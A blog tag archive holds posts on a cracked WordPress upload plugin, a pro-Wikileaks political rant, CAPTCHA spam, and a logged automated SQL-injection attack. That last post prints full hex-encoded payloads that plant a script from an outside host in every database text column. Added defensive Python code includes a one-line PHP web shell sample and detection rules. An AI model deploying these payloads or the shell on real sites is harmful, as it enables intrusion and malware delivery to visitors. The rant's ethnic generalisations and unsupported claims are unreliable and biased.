Tag Archive: DDoS

Turkish Hacker-Crackers, perhaps?

A Cracking Week Off?

I had a week’s holiday of sorts last week.  On returning I found that this website had been cracked. (I already had intimations that something was wrong because of site stat failures and an email from @Justin Asking, sometime commenter to this website and others).  Anyway, so it was.  Unfortunately, I didn’t have good web access so was unable to correct things properly.

The main screen, viewable on zone-h here, was replaced by this,

Site Hack Aug 2011

A neat little JavaScript mouse trailer was part of the package!

The cause was my own: a wide-open upload directory, created as part of an image upload plugin for my WordPress installation.  This plugin makes it easy and neat for any commenter to add material to the website... unfortunately for me, it allowed any file, with active content or not, to be uploaded.

Needless to say, the plugin is now disabled and the directory is locked down to the specific  file types that I’ll accept.  No more active content allowed there matey!

Unwanted Extras

Once the nasty files were uploaded, the internal site privileges allowed the install of a swathe of .htm files to the site root and uploads folder.  These had various names like f.htm, g.htm etc.  The file on show was index.htm.

Alongside these, apart from the files needed to run the previously mentioned JavaScript, was another swathe of .phtml files, such as joker.phtml, which are actually PHP code dressed up as HTML: on many Apache/PHP hosts (Debian's stock PHP module config, for one) the .phtml extension is handed to the PHP interpreter just like .php, so an upload filter that only blocks .php is not enough.  A couple of plain text files had also been uploaded.  These had lists of files, sites and persons.

All .htaccess files were okay, as were the WordPress installation files.  To be sure, I redid the WordPress install from scratch with freshly downloaded files.
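The two checks this section implies, as an added example in Python (not the author's code and not the plugin's): an upload filter that accepts only the image types on an allow-list, and a sweep of an existing uploads tree for the kind of files described above (f.htm, joker.phtml, stray text files, an uploaded .htaccess).  The allow-list, the magic-byte table and the sample directory tree are constructed for the example; the plugin's real validation is not shown on this page.

```python
import os
import tempfile

# Allow-list for the uploads directory (assumption for this example: the
# comment-upload plugin only needs images).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# Extensions that Apache or PHP may execute or that alter server behaviour.
# Every dotted part of the name is checked, not just the last one, because
# shell.php.jpg is still handed to PHP by some mod_mime configurations.
ACTIVE_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar",
                     "htm", "html", "js", "cgi", "pl", "sh", "htaccess"}

# Leading bytes of the allowed image formats (JPEG/PNG/GIF signatures).
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


def is_acceptable_upload(filename: str, data: bytes) -> bool:
    """Return True only for a file the uploads directory should hold.

    Rejects: path components or dot-files (.htaccess), any active extension
    anywhere in the name, a final extension off the allow-list, content whose
    leading bytes do not match the claimed type, and bodies carrying a PHP
    open tag or <script> (a polyglot that is also a valid image).
    """
    if not filename or os.path.basename(filename) != filename or filename.startswith("."):
        return False
    parts = filename.lower().split(".")
    if len(parts) < 2:
        return False
    extensions = parts[1:]
    if any(ext in ACTIVE_EXTENSIONS for ext in extensions):
        return False
    if extensions[-1] not in ALLOWED_EXTENSIONS:
        return False
    if not data.startswith(MAGIC[extensions[-1]]):
        return False
    lowered = data.lower()
    return b"<?php" not in lowered and b"<?=" not in lowered and b"<script" not in lowered


def find_suspicious_files(root: str) -> list:
    """Walk an existing uploads tree and list every file that would not pass
    is_acceptable_upload: stray .htm/.phtml/.txt files, polyglot images, an
    uploaded .htaccess.  Only the first 4 KiB of each file is read."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                head = fh.read(4096)
            if not is_acceptable_upload(name, head):
                hits.append(os.path.relpath(path, root).replace(os.sep, "/"))
    return sorted(hits)


def build_demo_tree() -> str:
    """Create a throw-away uploads directory with constructed sample files
    modelled on the names in the post (not the files actually recovered)."""
    root = tempfile.mkdtemp(prefix="uploads_")
    month = os.path.join(root, "2011", "08")
    os.makedirs(month)
    samples = {
        os.path.join(month, "photo.jpg"): MAGIC["jpg"] + b"\xe0\x00\x10JFIF" + b"\x00" * 32,
        os.path.join(month, "joker.phtml"): b"<?php echo 'owned'; ?>",
        os.path.join(month, "f.htm"): b"<html><body>Hacked</body></html>",
        os.path.join(month, "shell.php.jpg"): MAGIC["jpg"] + b"<?php system($_GET['c']); ?>",
        os.path.join(root, "names.txt"): b"list of sites and persons\n",
        os.path.join(root, ".htaccess"): b"AddHandler application/x-httpd-php .jpg\n",
    }
    for path, body in samples.items():
        with open(path, "wb") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for hit in find_suspicious_files(build_demo_tree()):
        print("suspicious:", hit)
```

The scanner applies the same filter to files already on disk, so a legitimate lockdown .htaccess in the uploads directory will be reported too; that is deliberate, since an attacker-supplied .htaccess re-enabling PHP for image extensions is exactly the thing to look for.  On Apache the server-side counterpart is to remove the PHP handler for the uploads directory altogether, so that even a file that slips past the filter is served as data rather than run.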

Finale

All told, about fifty files were dumped on my website.  I’ve hopefully removed the lot and have them downloaded for analysis at a later date.  The screen content and internal code all point to Turkish or S.E. Asian (Vietnam or Indonesia) Muslim crackers (I refuse to use the hacker term except to clarify the cracking of security by its now-common usage).  Saying this, the culprits (the code points to several authors who used freely downloadable files from cracking websites and then proudly expected a pat on the back for their extreme skill at doing a download...like....der....) could have come from anywhere.

Fifth columnists and agent-provocateurs are nothing new.

Interestingly, being cracked puts me in the same company as at least 186 well-known multinational businesses, such as Acer, Vodafone, Betfair, The Daily Telegraph, The Register, Spam.Org, Victoria Beckham and Destiny’s Child.

Even System of a Down dot com, was down!

Zone-h’s full list is here.  The Register reports it here, The Guardian here.

The Guardian interview with the crackers notes that the culprits had been planning the attack for some time which obviously includes the time when my site was compromised.  I don’t know if my website was actually used as part of the above DNS server attack but it’s usual for an attack like a DDOS to use several vectors and simultaneous attack points in order to force a server to fail and dump code.  This dump then reveals passwords and the like for later use.

Addendum

WordPress.Org’s forum has a posting about this crack from last week.  A Google search in the comment by RedNeckTexan shows the attack on this website to be far from unique...!   The links I’ve followed go right to the heart of the crack and the people doing the cracking.

This is the Google Search on the “Easy Comment Uploader” plugin.  Like me, RedNeckTexan has pulled the plugin for now, which can be found in the WordPress repository here.


Long Live Wikileaks!


Wikileaks at 213.251.145.96 Wikileaks at 213.251.145.96

These images will take you to the current IP addresses of Wikileaks. It follows on from my earlier help to the organisation here when a bunch of Swiss bankers mysteriously managed to influence “independent” judicial decisions in America.

The fact that I even have to do this is an abomination on the face of our so-called freedoms.

Governments: Unfit for purpose.

The Wikileaks “Cablegate” revelations have ensured that the vested interests of non-elected mad Arabs (UAE, Saudis) insisting that the US should bomb an elected group of mad Arabs (Iran) are plain for all to see.

They’ve also ensured that a whole raft of dirty tricks are now afoot. Coincidentally (not), as soon as Wikileaks released all the “Cablegate” stuff into a full download, the US Gov could then see what was coming and the dirty tricks have become even deadlier, nastier, and even less freedom-loving. It obviously proves that worse revelations are to come.

The Obamas/Clinton democrats are now joined in unison with the US republicans bellowing for instant executions without trial, Israelis, Arabs, Chinese and a host of other countries in an amazingly eclectic unholy alliance that proves that the whole diplomatic world is a very unhealthy cabal of back-scratching plebeian egoists with the safety and reputation of their own peoples far below that of the maintenance of their own expanding clique of free-loading arse-lickers.

The fact that they can get the tiny oligarchy of the DNS servers to pull the website index globally on whistle-blowers says it all about internet freedom and even the Internet’s resilience to nuclear attack (yes – its first purpose was to ensure that all nukes got released and that there would be some vestige of command and control, when invented by DARPA).

The fact that normal journalism is now so economically kowtowed that it is for the most part meekly submissive to the authoritarian demands of various states and multi-national corporations, also says it all.

The fact that sexual allegations against the Wikileaks founder coincided with the start of the leak about helicopter gunships mowing down unarmed civilians in broad daylight, and have since been expanded to continue with the recent shut-down of the site following an unprecedented DDoS website attack, says it all.

The fact that Wikileaks has upset all sides of all governments says it all and reveals them all to be unfit for purpose.

It makes me wonder if my father should’ve bothered turning up at D-Day or Okinawa. What was he fighting for, or against?

Buddhism, Ikeda, Mandela and Education

Today (coincidentally!), Daisaku Ikeda in his Daily Encouragement address to the world, said;

Monday, December 6th, 2010

---- DAILY ENCOURAGEMENT ----

“It has been more than 20 years since I first had the privilege of meeting with Nelson Mandela, the lionlike champion of human rights. Recently, former President Mandela, who had just turned 92, sent me an inscribed copy of his latest book. …I wish to share these words…as an expression of my deepest respect: ‘To the youth of today I also have a wish to make: ‘Be the script writers of your destiny and feature yourselves as the stars that show the way towards a brighter future–for our country, our continent and the world.’ ‘Education is the most powerful weapon we can use to change the world.‘”

What we see with the attacks upon Wikileaks, is an attack on freedom as it attacks the open knowledge base with which people need to be informed and thus educated. Without knowledge we are nothing.

We are like the women of Afghanistan, shackled by their surroundings of a male hierarchy and ignorant of everything except that which they’re told – except in our case, it’s our elected representatives who choose to hide the truth from us. And in the USA, with over 850,000 people now holding “top secret” status (which is 1.5 times the population of Washington), we see that the weight of state machinery now devoted to hiding the truth is immense.

What must be remembered, is that in nearly every single prominent Wikileak, the government has been found out to be doing bad things in our name. It’s nothing to do with national security as they claim, and everything to do with protecting those with comfy state jobs and a falsely clean reputation, no matter what they do.

Further Reading:

This is a copy of the main page entry.


Captcha Broken says Matt, I agree!

….That’s what I’ve determined empirically recently.  Matt’s (WordPress prime mover) post here and this article in the Guardian mention the various failings of CAPTCHA.

It’s the kind of thing that’s dawned on me progressively and is the reason I don’t use Captcha any more.  I’ve tested it and in the WordPress plugins that use it, I drop the option.  Part of the reason, initially, I admit, was because I couldn’t get it to work reliably across all my sites….

Because of software complexities and interactions, anyone who’s done this lark for a while knows the infuriating oddities that spring up with software, just when you least expect it!

So my modus operandi is to try lots of stuff (plugins etc), and any that have the slightest problem, slowness or irregularity get seriously looked at for 5 minutes, and if it’s un-solvable in that time, I ditch it!

As I said, the Captcha stuff came into this category, but simultaneously, I noticed subtle changes in the way and content of the various forms of spam reaching me.

Plugins that are actively monitored by their authors are also modified regularly as well (unless they were very good when they first wrote it!).  I’ve noticed something similar along these lines recently with a big splurge of almost daily updates from Akismet and Wp-SpamFree.   This suggests that the goalposts are moving rapidly currently, some of which I’ve mentioned in earlier posts like probable-ddos-attack-using-sql-injection-on-my-websites/, or false-invoice-e-mail-spam/ say.

Despite the Captcha problems Sabre is still good at blocking the false registration bastards.

And the basic Captcha principle is showing really good humanitarian use as I mentioned here, another-positive-use-for-the-computer-to-human-interface/.  Ironic really – one does bad, one does good.


Probable DDOS attack Using SQL Injection on my Websites

Over the last day, my sites have been really slow and twice to my knowledge have tripped out.  I’ve been getting a MySQL error message like so when I try to resolve the problem in phpMyAdmin;

MySQL: ERROR 1040: Too many connections

I tried hosting chat support (as I’m in a hurry) but the connection kept dropping.  During this process Google came to the fore and pushed me down several avenues of investigation.

This was one result, http://rackerhacker.com/2008/06/24/mysql-error-1040-too-many-connections/ from the web, and another from the horse’s mouth http://dev.mysql.com/doc/refman/5.0/en/too-many-connections.html

I then proceeded to check my WordPress plugins but couldn’t because the server wasn’t responding.  When it finally fired back up after quarter of an hour (!), I immediately disabled some OpenID plugins I’ve been playing with on one site and checked my databases were okay.

They were, but during the process I noticed that Wassup was the biggest table – unusually so.  Looking at some of the references in an extended list in the GUI, I noticed that several (random, as far as I could tell), post addresses were extre-e-e-e-e-mely long, terminating in some form of code.  Like so (It’s manually wrapped to fit into my theme);

http://strangelyperfect.tv/68/70s-mixer/?;DECLARE%20@S%20
CHAR(4000);SET%20@S=CAST(0x4445434C4152452040542
07661726368617228323535292C4043207661726368617
2283430303029204445434C415245205461626C655F437
572736F7220435552534F5220464F522073656C65637420
612E6E616D652C622E6E616D652066726F6D207379736F
626A6563747320612C737973636F6C756D6E7320622077
6865726520612E69643D622E696420616E6420612E7874
7970653D27752720616E642028622E78747970653D3939
206F7220622E78747970653D3335206F7220622E787479
70653D323331206F7220622E78747970653D313637292
04F50454E205461626C655F437572736F7220464554434
8204E4558542046524F4D20205461626C655F437572736
F7220494E544F2040542C4043205748494C45284040464
55443485F5354415455533D302920424547494E206578
65632827757064617465205B272B40542B275D2073657
4205B272B40432B275D3D2727223E3C2F7469746C653E3
C736372697074207372633D22687474703A2F2F777777
302E646F7568756E716E2E636E2F63737273732F772E6A7
3223E3C2F7363726970743E3C212D2D27272B5B272B404
32B275D20776865726520272B40432B27206E6F74206C69
6B6520272725223E3C2F7469746C653E3C73637269707420
7372633D22687474703A2F2F777777302E646F7568756E
716E2E636E2F63737273732F772E6A73223E3C2F7363726
970743E3C212D2D272727294645544348204E455854204
6524F4D20205461626C655F437572736F7220494E544F20
40542C404320454E4420434C4F5345205461626C655F43
7572736F72204445414C4C4F43415445205461626C655F
437572736F72%20AS%20CHAR(4000));EXEC(@S);  (addendum: clickable link removed as I’m using this plugin now)

If you copy & paste and try the link it won’t work now (read on for later ;-) ) but the correct link here does;

http://strangelyperfect.tv/68/70s-mixer/

Before my fix, the first link took the user to the correct page and it displayed in the browser address bar with the long link.  My suspicions were now being raised because the page displayed okay.  This must be all the WordPress updating I’ve done: it was a couple of updates back that the thing had some SQL Injection resistance built in.  It appears to fall over gracefully by ignoring duff requests.

So I chucked the “extra” part of the link into Google like so.   There are over 6k hits.

These posts got me thinking:

http://www.unsoughtinput.com/index.php/2006/11/09/comment-spam-deluge-did-our-captcha-get-hacked/

http://treyford.wordpress.com/2008/04/30/scary-mass-sql-attack/

http://www.thejoyofcode.com/Stop_trying_to_hack_me.aspx

and a neat fix, which I’ve implemented, I found here.

http://www.ravenphpscripts.com/postp122652.html (link removed as they’ve gone a bit funny all of a sudden)

What I’ve done is added the suggested code to my .htaccess file, like so:

# Added, protect from SQL Injection (sourced from) http://www.ravenphpscripts.com/postp122652.html
RewriteEngine On
# %{QUERY_STRING} is the raw, still percent-encoded query string, so "%20" is matched literally;
# [NC] makes the match case-insensitive
RewriteCond %{QUERY_STRING} ^.+DECLARE(%20)+@ [NC]
# "-" means no substitution; [F] answers 403 Forbidden and [L] stops processing further rules
RewriteRule ^.* - [F,L]

This has done the trick.  Anything banging into my site with that in the query string is rejected.  I haven’t implemented a polite screen; the [F] flag just returns a 403 Forbidden, the standard response from my host, as you’d have found with the first of my links above.

It’ll probably need twiddling in future but it’s okay for now.
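The payload above and the rule that blocks it, as an added Python example (not the author's code): it decodes the CAST(0x...) blob from the first injected link into the T-SQL it carries, lists the script URL that T-SQL writes into every text column, and compares the post's RewriteCond with a broader check on the URL-decoded query string.  The DECLARE/SET wrapper of the sample query string is reconstructed (an assumption), since the copy of the post above shows it mangled by an e-mail-obfuscation filter; the other sample query strings are constructed for the test.  Decoding also shows that the payload is written for Microsoft SQL Server (sysobjects, syscolumns, @@FETCH_STATUS, EXEC), so a MySQL-backed WordPress install could never have executed it; the rule's value here is turning each probe away before it costs a PHP process and a database connection.

```python
import re
from urllib.parse import unquote_plus

# The 0x... hex blob from the first injected link in the post, copied with the
# post's own manual line wrapping (whitespace is stripped before decoding).
PAYLOAD_HEX = """
4445434C4152452040542
07661726368617228323535292C4043207661726368617
2283430303029204445434C415245205461626C655F437
572736F7220435552534F5220464F522073656C65637420
612E6E616D652C622E6E616D652066726F6D207379736F
626A6563747320612C737973636F6C756D6E7320622077
6865726520612E69643D622E696420616E6420612E7874
7970653D27752720616E642028622E78747970653D3939
206F7220622E78747970653D3335206F7220622E787479
70653D323331206F7220622E78747970653D313637292
04F50454E205461626C655F437572736F7220464554434
8204E4558542046524F4D20205461626C655F437572736
F7220494E544F2040542C4043205748494C45284040464
55443485F5354415455533D302920424547494E206578
65632827757064617465205B272B40542B275D2073657
4205B272B40432B275D3D2727223E3C2F7469746C653E3
C736372697074207372633D22687474703A2F2F777777
302E646F7568756E716E2E636E2F63737273732F772E6A7
3223E3C2F7363726970743E3C212D2D27272B5B272B404
32B275D20776865726520272B40432B27206E6F74206C69
6B6520272725223E3C2F7469746C653E3C73637269707420
7372633D22687474703A2F2F777777302E646F7568756E
716E2E636E2F63737273732F772E6A73223E3C2F7363726
970743E3C212D2D272727294645544348204E455854204
6524F4D20205461626C655F437572736F7220494E544F20
40542C404320454E4420434C4F5345205461626C655F43
7572736F72204445414C4C4F43415445205461626C655F
437572736F72
"""

# Query string of the injected link.  The "DECLARE @S ... SET @S=" wrapper is
# reconstructed (assumption): the archived post shows it mangled by an
# e-mail-obfuscation filter, but the surviving "%20CHAR(4000)", "=CAST(" and
# "EXEC(@S)" fragments and the post's own RewriteCond fix its shape.
INJECTED_QUERY = (
    ";DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x"
    + re.sub(r"\s+", "", PAYLOAD_HEX)
    + "%20AS%20CHAR(4000));EXEC(@S);"
)


def decode_cast_payload(hex_text: str) -> str:
    """Recover the T-SQL hidden in a CAST(0x... AS CHAR(n)) argument."""
    return bytes.fromhex(re.sub(r"\s+", "", hex_text)).decode("latin-1")


def extract_script_sources(sql: str) -> list:
    """List the <script src="..."> URLs the decoded payload appends to every
    text column of every user table."""
    return sorted(set(re.findall(r'<script src="([^"]+)"', sql)))


# The post's .htaccess condition, applied to the raw (still percent-encoded)
# query string exactly as mod_rewrite sees it: ^.+DECLARE(%20)+@ [NC]
HTACCESS_RULE = re.compile(r"^.+DECLARE(%20)+@", re.IGNORECASE)

# A broader check on the URL-decoded form: catches "+" spacing, a DECLARE at
# the very start of the query string, and the CAST/EXEC pair even if the
# variable name or the DECLARE itself changes.
BROAD_RULE = re.compile(
    r"DECLARE\s+@\w+\s+N?(?:VAR)?CHAR|EXEC\s*\(\s*@|CAST\s*\(\s*0x[0-9A-F]{8,}",
    re.IGNORECASE,
)


def matches_htaccess_rule(query_string: str) -> bool:
    """True if the post's RewriteCond would return 403 for this request."""
    return HTACCESS_RULE.search(query_string) is not None


def is_mass_sqli(query_string: str) -> bool:
    """True if either the raw or the URL-decoded query string carries the
    DECLARE/CAST/EXEC signature of the automated SQL Server injection worm."""
    if matches_htaccess_rule(query_string):
        return True
    return BROAD_RULE.search(unquote_plus(query_string)) is not None


if __name__ == "__main__":
    print(decode_cast_payload(PAYLOAD_HEX))
    print(extract_script_sources(decode_cast_payload(PAYLOAD_HEX)))
```

The original condition starts with ^.+, so a query string that begins with DECLARE is not caught, and it only recognises %20 as the separator; the broader check shows one way to close both gaps.  Matching on the raw string is still the cheapest first line of defence, because mod_rewrite sees the request before PHP and MySQL do.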

Another similar link was:

http://strangelyperfect.tv/287/finally-a-bit-more-on-the-air-powered-car-from-guy-negre/
/?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434
C415245204054207661726368617228323535292C4043207
6617263686172283430303029204445434C4152452054616
26C655F437572736F7220435552534F5220464F522073656C
65637420612E6E616D652C622E6E616D652066726F6D2073
79736F626A6563747320612C737973636F6C756D6E732062
20776865726520612E69643D622E696420616E6420612E78
747970653D27752720616E642028622E78747970653D3939
206F7220622E78747970653D3335206F7220622E787479706
53D323331206F7220622E78747970653D31363729204F5045
4E205461626C655F437572736F72204645544348204E45585
42046524F4D20205461626C655F437572736F7220494E544F
2040542C4043205748494C4528404046455443485F535441
5455533D302920424547494E206578656328277570646174
65205B272B40542B275D20736574205B272B40432B275D3D
2727223E3C2F7469746C653E3C736372697074207372633D
22687474703A2F2F777777302E646F7568756E716E2E636E2
F63737273732F772E6A73223E3C2F7363726970743E3C212D
2D27272B5B272B40432B275D20776865726520272B40432B
27206E6F74206C696B6520272725223E3C2F7469746C653E3
C736372697074207372633D22687474703A2F2F777777302
E646F7568756E716E2E636E2F63737273732F772E6A73223E
3C2F7363726970743E3C212D2D272727294645544348204E
4558542046524F4D20205461626C655F437572736F722049
4E544F2040542C404320454E4420434C4F5345205461626C
655F437572736F72204445414C4C4F43415445205461626C6
55F437572736F72%20AS%20CHAR(4000));EXEC(@S);

which should point to:

http://strangelyperfect.tv/287/finally-a-bit-more-on-the-air-powered-car-from-guy-negre/

This was especially troublesome as the post title was long anyway, so in the browser address bar it looked as though everything was okay!


© 2007-2017 Strangely Perfect All Rights Reserved -- Copyright notice by me